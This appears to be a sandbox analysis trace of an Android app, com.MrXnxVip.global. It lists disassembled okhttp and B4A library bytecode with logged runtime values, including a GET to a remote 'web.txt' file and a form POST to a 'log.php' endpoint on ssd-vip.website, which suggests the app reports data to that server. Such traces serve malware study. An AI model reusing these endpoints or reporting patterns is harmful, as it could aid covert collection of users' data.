                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.RuntimeException.<init>
                        Strings
                        • icon
                        • java.lang.String@655458a
                        • java.lang.String@bff195d
                        • com.MrXnxVip.global
                        • .main
                        Position Instruction Meta Information
                        0new-instance p0, Lanywheresoftware/b4a/objects/NotificationWrapper;
                        2invoke-direct {p0}, Lanywheresoftware/b4a/objects/NotificationWrapper;-><init>()V
                        3const/4 v0, 0x2
                        5invoke-virtual {p0, v0}, Lanywheresoftware/b4a/objects/NotificationWrapper;->Initialize2(I)V
                        7const-string v0, "icon"
                        9invoke-virtual {p0, v0}, Lanywheresoftware/b4a/objects/NotificationWrapper;->setIcon(Ljava/lang/String;)V
                        • Time: 812115
                          • This:
                            • anywheresoftware.b4a.objects.NotificationWrapper$NotificationData@e9a0734
                          • Return:
                            • java.lang.Class@9f6fd3b
                            • getName: anywheresoftware.b4a.objects.NotificationWrapper$NotificationData
                        • Time: 812116
                          • This:
                            • anywheresoftware.b4a.objects.NotificationWrapper@6d3a07
                          • Return:
                            • java.lang.String@bff195d
                        • Time: 812114
                          • This:
                            • anywheresoftware.b4a.objects.NotificationWrapper@6d3a07
                          • p0: status
                        • Time: 812199
                          • This:
                            • anywheresoftware.b4a.objects.NotificationWrapper@a2add2c
                          • Return:
                            • java.lang.String@655458a
                        10try_start_e:
                        11sget-object v0, Lanywheresoftware/b4a/keywords/Common;->Application:Lanywheresoftware/b4a/keywords/B4AApplication;
                        13invoke-static {}, Lanywheresoftware/b4a/keywords/B4AApplication;->getLabelName()Ljava/lang/String;
                        • Time: 812119
                          • This:
                            • android.app.ApplicationPackageManager@7c3e79
                          • packageName: com.MrXnxVip.global
                          • flags: 0
                          • Return:
                            • ApplicationInfo{4652d2 com.MrXnxVip.global}
                        • Time: 812120
                          • Return:
                        14move-result-object v0
                        16sget-object v1, Lanywheresoftware/b4a/keywords/Common;->Application:Lanywheresoftware/b4a/keywords/B4AApplication;
                        18invoke-static {}, Lanywheresoftware/b4a/keywords/B4AApplication;->getLabelName()Ljava/lang/String;
                        • Time: 812121
                          • This:
                            • android.app.ApplicationPackageManager@7c3e79
                          • packageName: com.MrXnxVip.global
                          • flags: 0
                          • Return:
                            • ApplicationInfo{4652d2 com.MrXnxVip.global}
                        • Time: 812122
                          • Return:
                        19move-result-object v1
                        20new-instance v2, Ljava/lang/StringBuilder;
                        22sget-object v3, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        24invoke-static {v3}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        25move-result-object v3
                        27invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        29const-string v3, ".main"
                        31invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        34move-result-object v2
                        36invoke-static {v2}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        37move-result-object v2
                        39invoke-virtual {p0, p1, v0, v1, v2}, Lanywheresoftware/b4a/objects/NotificationWrapper;->SetInfoNew(Lanywheresoftware/b4a/BA;Ljava/lang/CharSequence;Ljava/lang/CharSequence;Ljava/lang/Object;)V
                        41invoke-virtual {p0}, Lanywheresoftware/b4a/objects/NotificationWrapper;->getObject()Ljava/lang/Object;
                        42move-result-object p0
                        43check-cast p0, Landroid/app/Notification;
                        44try_end_3b: return-object p0
                        45catch_3c: move-exception p0
                        46new-instance p1, Ljava/lang/RuntimeException;
                        48invoke-direct {p1, p0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        49throw p1
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.ProtocolException.<init>
                        • okhttp3.internal.connection.RouteException.getLastConnectException
                        • okhttp3.internal.connection.RouteException.getFirstConnectException
                        • okhttp3.internal.connection.RouteException.getFirstConnectException
                        • java.io.IOException.<init>
                        Strings
                        • chain
                        • Too many follow-up requests:
                        • Canceled
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        6const-string v0, "chain"
                        8invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        9check-cast p1, Lokhttp3/internal/http/RealInterceptorChain;
                        11invoke-virtual {p1}, Lokhttp3/internal/http/RealInterceptorChain;->getRequest$okhttp()Lokhttp3/Request;
                        12move-result-object v0
                        14invoke-virtual {p1}, Lokhttp3/internal/http/RealInterceptorChain;->getCall$okhttp()Lokhttp3/internal/connection/RealCall;
                        15move-result-object v1
                        16const/4 v2, 0x0
                        17move-object v3, v2
                        18check-cast v3, Lokhttp3/Response;
                        20invoke-static {}, Lkotlin/collections/CollectionsKt;->emptyList()Ljava/util/List;
                        21move-result-object v4
                        22const/4 v5, 0x1
                        23const/4 v6, 0x0
                        24const/4 v7, 0x1
                        25const/4 v8, 0x0
                        26goto_1b:
                        27invoke-virtual {v1, v0, v7}, Lokhttp3/internal/connection/RealCall;->enterNetworkInterceptorExchange(Lokhttp3/Request;Z)V
                        28try_start_1e:
                        29invoke-virtual {v1}, Lokhttp3/internal/connection/RealCall;->isCanceled()Z
                        • Time: 697360
                          • This:
                            • okhttp3.internal.connection.RealCall@a6f051
                          • Return:
                            • false
                        30move-result v7
                        31try_end_22: if-nez v7, :cond_de
                        32try_start_24:
                        33invoke-virtual {p1, v0}, Lokhttp3/internal/http/RealInterceptorChain;->proceed(Lokhttp3/Request;)Lokhttp3/Response;
                        34move-result-object v0
                        35try_end_28: if-eqz v3, :cond_42
                        36try_start_2a:
                        37invoke-virtual {v0}, Lokhttp3/Response;->newBuilder()Lokhttp3/Response$Builder;
                        38move-result-object v0
                        40invoke-virtual {v3}, Lokhttp3/Response;->newBuilder()Lokhttp3/Response$Builder;
                        41move-result-object v3
                        43invoke-virtual {v3, v2}, Lokhttp3/Response$Builder;->body(Lokhttp3/ResponseBody;)Lokhttp3/Response$Builder;
                        44move-result-object v3
                        46invoke-virtual {v3}, Lokhttp3/Response$Builder;->build()Lokhttp3/Response;
                        47move-result-object v3
                        49invoke-virtual {v0, v3}, Lokhttp3/Response$Builder;->priorResponse(Lokhttp3/Response;)Lokhttp3/Response$Builder;
                        50move-result-object v0
                        52invoke-virtual {v0}, Lokhttp3/Response$Builder;->build()Lokhttp3/Response;
                        53move-result-object v0
                        54cond_42: move-object v3, v0
                        56invoke-virtual {v1}, Lokhttp3/internal/connection/RealCall;->getInterceptorScopedExchange$okhttp()Lokhttp3/internal/connection/Exchange;
                        57move-result-object v0
                        59invoke-direct {p0, v3, v0}, Lokhttp3/internal/http/RetryAndFollowUpInterceptor;->followUpRequest(Lokhttp3/Response;Lokhttp3/internal/connection/Exchange;)Lokhttp3/Request;
                        60move-result-object v7
                        61if-nez v7, :cond_5c
                        62if-eqz v0, :cond_58
                        64invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->isDuplex$okhttp()Z
                        • Time: 700172
                          • This:
                            • okhttp3.internal.connection.Exchange@6711d42
                          • Return:
                            • false
                        65move-result p1
                        66if-eqz p1, :cond_58
                        68invoke-virtual {v1}, Lokhttp3/internal/connection/RealCall;->timeoutEarlyExit()V
                        69try_end_58:
                        70invoke-virtual {v1, v6}, Lokhttp3/internal/connection/RealCall;->exitNetworkInterceptorExchange$okhttp(Z)V
                        71return-object v3
                        72cond_5c:
                        73invoke-virtual {v7}, Lokhttp3/Request;->body()Lokhttp3/RequestBody;
                        74move-result-object v0
                        75if-eqz v0, :cond_6c
                        77invoke-virtual {v0}, Lokhttp3/RequestBody;->isOneShot()Z
                        78move-result v0
                        79try_end_66: if-eqz v0, :cond_6c
                        81invoke-virtual {v1, v6}, Lokhttp3/internal/connection/RealCall;->exitNetworkInterceptorExchange$okhttp(Z)V
                        82return-object v3
                        83cond_6c:
                        84invoke-virtual {v3}, Lokhttp3/Response;->body()Lokhttp3/ResponseBody;
                        85move-result-object v0
                        86if-eqz v0, :cond_77
                        87check-cast v0, Ljava/io/Closeable;
                        89invoke-static {v0}, Lokhttp3/internal/Util;->closeQuietly(Ljava/io/Closeable;)V
                        90try_end_77: add-int/lit8 v8, v8, 0x1
                        91const/16 v0, 0x14
                        92if-gt v8, v0, :cond_83
                        94invoke-virtual {v1, v5}, Lokhttp3/internal/connection/RealCall;->exitNetworkInterceptorExchange$okhttp(Z)V
                        95move-object v0, v7
                        96const/4 v7, 0x1
                        97goto/16 :goto_1b
                        98cond_83: new-instance p1, Ljava/net/ProtocolException;
                        99new-instance v0, Ljava/lang/StringBuilder;
                        101invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        103const-string v2, "Too many follow-up requests: "
                        105invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        107invoke-virtual {v0, v8}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        109invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        110move-result-object v0
                        112invoke-direct {p1, v0}, Ljava/net/ProtocolException;-><init>(Ljava/lang/String;)V
                        113check-cast p1, Ljava/lang/Throwable;
                        114throw p1
                        115catch_9c: move-exception v7
                        116instance-of v9, v7, Lokhttp3/internal/http2/ConnectionShutdownException;
                        117if-nez v9, :cond_a3
                        118const/4 v9, 0x1
                        119goto/16 :goto_a4
                        120cond_a3: const/4 v9, 0x0
                        121goto_a4:
                        122invoke-direct {p0, v7, v1, v0, v9}, Lokhttp3/internal/http/RetryAndFollowUpInterceptor;->recover(Ljava/io/IOException;Lokhttp3/internal/connection/RealCall;Lokhttp3/Request;Z)Z
                        123move-result v9
                        124if-eqz v9, :cond_b1
                        125check-cast v4, Ljava/util/Collection;
                        127invoke-static {v4, v7}, Lkotlin/collections/CollectionsKt;->plus(Ljava/util/Collection;Ljava/lang/Object;)Ljava/util/List;
                        128move-result-object v4
                        129goto/16 :goto_cd
                        130cond_b1: check-cast v7, Ljava/lang/Exception;
                        132invoke-static {v7, v4}, Lokhttp3/internal/Util;->withSuppressed(Ljava/lang/Exception;Ljava/util/List;)Ljava/lang/Throwable;
                        133move-result-object p1
                        134throw p1
                        135catch_b8: move-exception v7
                        137invoke-virtual {v7}, Lokhttp3/internal/connection/RouteException;->getLastConnectException()Ljava/io/IOException;
                        138move-result-object v9
                        140invoke-direct {p0, v9, v1, v0, v6}, Lokhttp3/internal/http/RetryAndFollowUpInterceptor;->recover(Ljava/io/IOException;Lokhttp3/internal/connection/RealCall;Lokhttp3/Request;Z)Z
                        141move-result v9
                        142if-eqz v9, :cond_d3
                        143check-cast v4, Ljava/util/Collection;
                        145invoke-virtual {v7}, Lokhttp3/internal/connection/RouteException;->getFirstConnectException()Ljava/io/IOException;
                        146move-result-object v7
                        148invoke-static {v4, v7}, Lkotlin/collections/CollectionsKt;->plus(Ljava/util/Collection;Ljava/lang/Object;)Ljava/util/List;
                        149move-result-object v4
                        150try_end_cd:
                        151invoke-virtual {v1, v5}, Lokhttp3/internal/connection/RealCall;->exitNetworkInterceptorExchange$okhttp(Z)V
                        152const/4 v7, 0x0
                        153goto/16 :goto_1b
                        154try_start_d3:
                        155invoke-virtual {v7}, Lokhttp3/internal/connection/RouteException;->getFirstConnectException()Ljava/io/IOException;
                        156move-result-object p1
                        157check-cast p1, Ljava/lang/Exception;
                        159invoke-static {p1, v4}, Lokhttp3/internal/Util;->withSuppressed(Ljava/lang/Exception;Ljava/util/List;)Ljava/lang/Throwable;
                        160move-result-object p1
                        161throw p1
                        162cond_de: new-instance p1, Ljava/io/IOException;
                        164const-string v0, "Canceled"
                        166invoke-direct {p1, v0}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
                        167check-cast p1, Ljava/lang/Throwable;
                        168throw p1
                        169try_end_e8: move-exception p1
                        171invoke-virtual {v1, v5}, Lokhttp3/internal/connection/RealCall;->exitNetworkInterceptorExchange$okhttp(Z)V
                        172goto/16 :goto_ee
                        173goto_ed: throw p1
                        174goto_ee: goto/16 :goto_ed
                        Cross References
                        APIs
                        • java.util.HashMap.<init>
                        • java.lang.RuntimeException.<init>
                        • java.util.HashMap.get
                        • java.util.LinkedList.<init>
                        • java.util.HashMap.put
                        • java.util.LinkedList.iterator
                        • java.util.Iterator.hasNext
                        • java.util.LinkedList.addLast
                        • java.util.LinkedList.addFirst
                        • java.util.Iterator.next
                        • java.lang.ref.WeakReference.get
                        • java.util.Iterator.remove
                        Strings
                        • Resumable sub already completed
                        Position Instruction Meta Information
                        1iget-object v0, p1, Lanywheresoftware/b4a/BA;->waitForEvents:Ljava/util/HashMap;
                        2if-nez v0, :cond_b
                        3new-instance v0, Ljava/util/HashMap;
                        5invoke-direct {v0}, Ljava/util/HashMap;-><init>()V
                        6iput-object v0, p1, Lanywheresoftware/b4a/BA;->waitForEvents:Ljava/util/HashMap;
                        7cond_b: instance-of v0, p3, Lanywheresoftware/b4a/ObjectWrapper;
                        8if-eqz v0, :cond_15
                        9check-cast p3, Lanywheresoftware/b4a/ObjectWrapper;
                        11invoke-interface {p3}, Lanywheresoftware/b4a/ObjectWrapper;->getObject()Ljava/lang/Object;
                        12move-result-object p3
                        13cond_15: instance-of v0, p3, Lanywheresoftware/b4a/BA$ResumableSub;
                        14if-eqz v0, :cond_2b
                        15move-object v0, p3
                        16check-cast v0, Lanywheresoftware/b4a/BA$ResumableSub;
                        17iget-boolean v1, v0, Lanywheresoftware/b4a/BA$ResumableSub;->completed:Z
                        18if-nez v1, :cond_23
                        19iput-object p1, v0, Lanywheresoftware/b4a/BA$ResumableSub;->waitForBA:Lanywheresoftware/b4a/BA;
                        20goto/16 :goto_2b
                        21cond_23: new-instance p0, Ljava/lang/RuntimeException;
                        23const-string p1, "Resumable sub already completed"
                        25invoke-direct {p0, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        26throw p0
                        27goto_2b:
                        28iget-object v0, p1, Lanywheresoftware/b4a/BA;->waitForEvents:Ljava/util/HashMap;
                        30invoke-virtual {v0, p0}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        31move-result-object v0
                        32check-cast v0, Ljava/util/LinkedList;
                        33if-nez v0, :cond_3f
                        34new-instance v0, Ljava/util/LinkedList;
                        36invoke-direct {v0}, Ljava/util/LinkedList;-><init>()V
                        38iget-object p1, p1, Lanywheresoftware/b4a/BA;->waitForEvents:Ljava/util/HashMap;
                        40invoke-virtual {p1, p0, v0}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        41cond_3f: const/4 p0, 0x0
                        43invoke-virtual {v0}, Ljava/util/LinkedList;->iterator()Ljava/util/Iterator;
                        44move-result-object p1
                        45goto_44:
                        46invoke-interface {p1}, Ljava/util/Iterator;->hasNext()Z
                        47move-result v1
                        48if-nez v1, :cond_5f
                        49if-nez p0, :cond_5e
                        50new-instance p0, Lanywheresoftware/b4a/BA$WaitForEvent;
                        52invoke-direct {p0, p2, p3}, Lanywheresoftware/b4a/BA$WaitForEvent;-><init>(Lanywheresoftware/b4a/BA$ResumableSub;Ljava/lang/Object;)V
                        54invoke-virtual {p0}, Lanywheresoftware/b4a/BA$WaitForEvent;->noFilter()Z
                        • Time: 695413
                          • This:
                            • anywheresoftware.b4a.BA$WaitForEvent@791e1e
                          • Return:
                            • true
                        55move-result p1
                        56if-eqz p1, :cond_5b
                        58invoke-virtual {v0, p0}, Ljava/util/LinkedList;->addLast(Ljava/lang/Object;)V
                        59goto/16 :goto_5e
                        60cond_5b:
                        61invoke-virtual {v0, p0}, Ljava/util/LinkedList;->addFirst(Ljava/lang/Object;)V
                        62goto_5e: return-void
                        63cond_5f:
                        64invoke-interface {p1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        65move-result-object v1
                        66check-cast v1, Lanywheresoftware/b4a/BA$WaitForEvent;
                        67if-nez p0, :cond_7d
                        68if-nez p3, :cond_6f
                        70invoke-virtual {v1}, Lanywheresoftware/b4a/BA$WaitForEvent;->noFilter()Z
                        71move-result v2
                        72if-nez v2, :cond_79
                        73cond_6f: if-eqz p3, :cond_7d
                        75iget-object v2, v1, Lanywheresoftware/b4a/BA$WaitForEvent;->senderFilter:Ljava/lang/ref/WeakReference;
                        77invoke-virtual {v2}, Ljava/lang/ref/WeakReference;->get()Ljava/lang/Object;
                        78move-result-object v2
                        79if-ne p3, v2, :cond_7d
                        80cond_79: const/4 p0, 0x1
                        81iput-object p2, v1, Lanywheresoftware/b4a/BA$WaitForEvent;->rs:Lanywheresoftware/b4a/BA$ResumableSub;
                        82goto/16 :goto_44
                        83cond_7d:
                        84invoke-virtual {v1}, Lanywheresoftware/b4a/BA$WaitForEvent;->cleared()Z
                        85move-result v1
                        86if-eqz v1, :cond_44
                        88invoke-interface {p1}, Ljava/util/Iterator;->remove()V
                        89goto/16 :goto_44
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.lang.Iterable.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • okhttp3.Protocol.HTTP_1_0:Lokhttp3/Protocol
                        • java.util.Collection.add
                        • java.util.ArrayList.<init>
                        • java.lang.Iterable.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • okhttp3.Protocol.toString
                        • java.util.Collection.add
                        Strings
                        • protocols
                        • h2
                        • http/1.1
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/util/List<",
                        4"+",
                        5"Lokhttp3/Protocol;",
                        6">;)",
                        7"Ljava/util/List<",
                        8"Ljava/lang/String;",
                        9">;"
                        10}
                        11.end annotation
                        13const-string v0, "protocols"
                        15invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        16check-cast p1, Ljava/lang/Iterable;
                        17new-instance v0, Ljava/util/ArrayList;
                        19invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
                        20check-cast v0, Ljava/util/Collection;
                        22invoke-interface {p1}, Ljava/lang/Iterable;->iterator()Ljava/util/Iterator;
                        23move-result-object p1
                        24goto_12:
                        25invoke-interface {p1}, Ljava/util/Iterator;->hasNext()Z
                        26move-result v1
                        27if-eqz v1, :cond_2c
                        29invoke-interface {p1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        30move-result-object v1
                        31move-object v2, v1
                        32check-cast v2, Lokhttp3/Protocol;
                        34sget-object v3, Lokhttp3/Protocol;->HTTP_1_0:Lokhttp3/Protocol;
                        35if-eq v2, v3, :cond_25
                        36const/4 v2, 0x1
                        37goto/16 :goto_26
                        38cond_25: const/4 v2, 0x0
                        39goto_26: if-eqz v2, :cond_12
                        41invoke-interface {v0, v1}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        42goto/16 :goto_12
                        43cond_2c: check-cast v0, Ljava/util/List;
                        44check-cast v0, Ljava/lang/Iterable;
                        45new-instance p1, Ljava/util/ArrayList;
                        46const/16 v1, 0xa
                        48invoke-static {v0, v1}, Lkotlin/collections/CollectionsKt;->collectionSizeOrDefault(Ljava/lang/Iterable;I)I
                        49move-result v1
                        51invoke-direct {p1, v1}, Ljava/util/ArrayList;-><init>(I)V
                        52check-cast p1, Ljava/util/Collection;
                        54invoke-interface {v0}, Ljava/lang/Iterable;->iterator()Ljava/util/Iterator;
                        55move-result-object v0
                        56goto_41:
                        57invoke-interface {v0}, Ljava/util/Iterator;->hasNext()Z
                        58move-result v1
                        59if-eqz v1, :cond_55
                        61invoke-interface {v0}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        62move-result-object v1
                        63check-cast v1, Lokhttp3/Protocol;
                        65invoke-virtual {v1}, Lokhttp3/Protocol;->toString()Ljava/lang/String;
                        • Time: 698924
                          • This:
                            • h2
                          • Return:
                            • h2
                        • Time: 698926
                          • This:
                            • http/1.1
                          • Return:
                            • http/1.1
                        66move-result-object v1
                        68invoke-interface {p1, v1}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        69goto/16 :goto_41
                        70cond_55: check-cast p1, Ljava/util/List;
                        71return-object p1
                        Cross References
                        APIs
                        • java.lang.Thread.holdsLock
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Thread.currentThread
                        • java.lang.Thread.getName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.AssertionError.<init>
                        Strings
                        • Thread
                        • Thread.currentThread()
                        • MUST NOT hold lock on
                        Position Instruction Meta Information
                        0sget-boolean v0, Lokhttp3/internal/Util;->assertionsEnabled:Z
                        1if-eqz v0, :cond_39
                        3invoke-static {p0}, Ljava/lang/Thread;->holdsLock(Ljava/lang/Object;)Z
                        4move-result v0
                        5if-nez v0, :cond_b
                        6goto/16 :goto_39
                        7cond_b: new-instance v0, Ljava/lang/AssertionError;
                        8new-instance v1, Ljava/lang/StringBuilder;
                        10invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        12const-string v2, "Thread "
                        14invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        16invoke-static {}, Ljava/lang/Thread;->currentThread()Ljava/lang/Thread;
                        17move-result-object v2
                        19const-string v3, "Thread.currentThread()"
                        21invoke-static {v2, v3}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        23invoke-virtual {v2}, Ljava/lang/Thread;->getName()Ljava/lang/String;
                        24move-result-object v2
                        26invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        28const-string v2, " MUST NOT hold lock on "
                        30invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32invoke-virtual {v1, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        34invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object v1
                        37invoke-direct {v0, v1}, Ljava/lang/AssertionError;-><init>(Ljava/lang/Object;)V
                        38check-cast v0, Ljava/lang/Throwable;
                        39throw v0
                        40cond_39:
                        41iget-object v0, p0, Lokhttp3/internal/concurrent/TaskQueue;->taskRunner:Lokhttp3/internal/concurrent/TaskRunner;
                        42monitor-enter v0
                        43try_start_3c:
                        44invoke-virtual {p0}, Lokhttp3/internal/concurrent/TaskQueue;->cancelAllAndDecide$okhttp()Z
                        • Time: 700535
                          • This:
                            • Q10000
                          • Return:
                            • true
                        45move-result v1
                        46if-eqz v1, :cond_47
                        48iget-object v1, p0, Lokhttp3/internal/concurrent/TaskQueue;->taskRunner:Lokhttp3/internal/concurrent/TaskRunner;
                        50invoke-virtual {v1, p0}, Lokhttp3/internal/concurrent/TaskRunner;->kickCoordinator$okhttp(Lokhttp3/internal/concurrent/TaskQueue;)V
                        51cond_47:
                        52sget-object v1, Lkotlin/Unit;->INSTANCE:Lkotlin/Unit;
                        53try_end_49: monitor-exit v0
                        54return-void
                        55catchall_4b: move-exception v1
                        56monitor-exit v0
                        57throw v1
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • request
                        • proxyType
                        • GET
                        • POST
                        • HTTP/1.1
                        • StringBuilder().apply(builderAction).toString()
                        Position Instruction Meta Information
                        1const-string v0, "request"
                        3invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        5const-string v0, "proxyType"
                        7invoke-static {p2, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        8new-instance v0, Ljava/lang/StringBuilder;
                        10invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        12invoke-virtual {p1}, Lokhttp3/Request;->method()Ljava/lang/String;
                        • Time: 699271
                          • This:
                            • Request{method=GET, url=https://ssd-vip.website/lord/web.txt, headers=[Host:ssd-vip.website, Connection:Keep-Alive, Accept-Encoding:gzip, User-Agent:okhttp/4.9.0]}
                          • Return:
                            • GET
                        • Time: 699320
                          • This:
                            • Request{method=POST, url=https://ssd-vip.website/lord/log.php, headers=[Content-Type:application/x-www-form-urlencoded, Content-Length:123, Host:ssd-vip.website, Connection:Keep-Alive, Accept-Encoding:gzip, User-Agent:okhttp/4.9.0]}
                          • Return:
                            • POST
                        13move-result-object v1
                        15invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        16const/16 v1, 0x20
                        18invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        20sget-object v1, Lokhttp3/internal/http/RequestLine;->INSTANCE:Lokhttp3/internal/http/RequestLine;
                        22invoke-direct {v1, p1, p2}, Lokhttp3/internal/http/RequestLine;->includeAuthorityInRequestLine(Lokhttp3/Request;Ljava/net/Proxy$Type;)Z
                        23move-result p2
                        24if-eqz p2, :cond_2b
                        26invoke-virtual {p1}, Lokhttp3/Request;->url()Lokhttp3/HttpUrl;
                        27move-result-object p1
                        29invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        30goto/16 :goto_38
                        31cond_2b:
                        32sget-object p2, Lokhttp3/internal/http/RequestLine;->INSTANCE:Lokhttp3/internal/http/RequestLine;
                        34invoke-virtual {p1}, Lokhttp3/Request;->url()Lokhttp3/HttpUrl;
                        35move-result-object p1
                        37invoke-virtual {p2, p1}, Lokhttp3/internal/http/RequestLine;->requestPath(Lokhttp3/HttpUrl;)Ljava/lang/String;
                        38move-result-object p1
                        40invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        41goto_38:
                        42const-string p1, " HTTP/1.1"
                        44invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        46invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        47move-result-object p1
                        49const-string p2, "StringBuilder().apply(builderAction).toString()"
                        51invoke-static {p1, p2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        52return-object p1
                        Cross References
                        APIs
                        • android.content.Intent.getBooleanExtra
                        • android.content.Intent.getIntExtra
                        • java.lang.Integer.valueOf
                        • java.util.HashMap.remove
                        • android.os.PowerManager$WakeLock.release
                        • android.content.Intent.hasExtra
                        • android.content.Intent.getParcelableExtra
                        • java.lang.RuntimeException.<init>
                        Strings
                        • b4a_foreground
                        • b4a_wakelock
                        • b4a_internal_intent
                        • Service started in foreground mode.
                        Position Instruction Meta Information
                        0new-instance v0, Lanywheresoftware/b4a/objects/IntentWrapper;
                        2invoke-direct {v0}, Lanywheresoftware/b4a/objects/IntentWrapper;-><init>()V
                        3const/4 v1, 0x0
                        4if-eqz p0, :cond_3b
                        6const-string v2, "b4a_foreground"
                        8invoke-virtual {p0, v2, v1}, Landroid/content/Intent;->getBooleanExtra(Ljava/lang/String;Z)Z
                        9move-result v2
                        11const-string v3, "b4a_wakelock"
                        13invoke-virtual {p0, v3, v1}, Landroid/content/Intent;->getIntExtra(Ljava/lang/String;I)I
                        14move-result v1
                        15if-lez v1, :cond_25
                        17sget-object v3, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->wakeLocks:Ljava/util/HashMap;
                        19invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        20move-result-object v1
                        22invoke-virtual {v3, v1}, Ljava/util/HashMap;->remove(Ljava/lang/Object;)Ljava/lang/Object;
                        23move-result-object v1
                        24check-cast v1, Landroid/os/PowerManager$WakeLock;
                        26invoke-virtual {v1}, Landroid/os/PowerManager$WakeLock;->release()V
                        27cond_25:
                        28const-string v1, "b4a_internal_intent"
                        30invoke-virtual {p0, v1}, Landroid/content/Intent;->hasExtra(Ljava/lang/String;)Z
                        31move-result v3
                        32if-eqz v3, :cond_37
                        34invoke-virtual {p0, v1}, Landroid/content/Intent;->getParcelableExtra(Ljava/lang/String;)Landroid/os/Parcelable;
                        35move-result-object p0
                        36check-cast p0, Landroid/content/Intent;
                        38invoke-virtual {v0, p0}, Lanywheresoftware/b4a/objects/IntentWrapper;->setObject(Ljava/lang/Object;)V
                        39goto/16 :goto_3a
                        40cond_37:
                        41invoke-virtual {v0, p0}, Lanywheresoftware/b4a/objects/IntentWrapper;->setObject(Ljava/lang/Object;)V
                        42goto_3a: move v1, v2
                        43cond_3b: if-eqz v1, :cond_42
                        45const-string p0, "Service started in foreground mode."
                        47invoke-static {p0}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        • Time: 702732
                          • p0: Service started in foreground mode.
                        48cond_42: iget p0, p1, Lanywheresoftware/b4a/objects/ServiceHelper;->AutomaticForegroundMode:I
                        49const/4 v2, 0x1
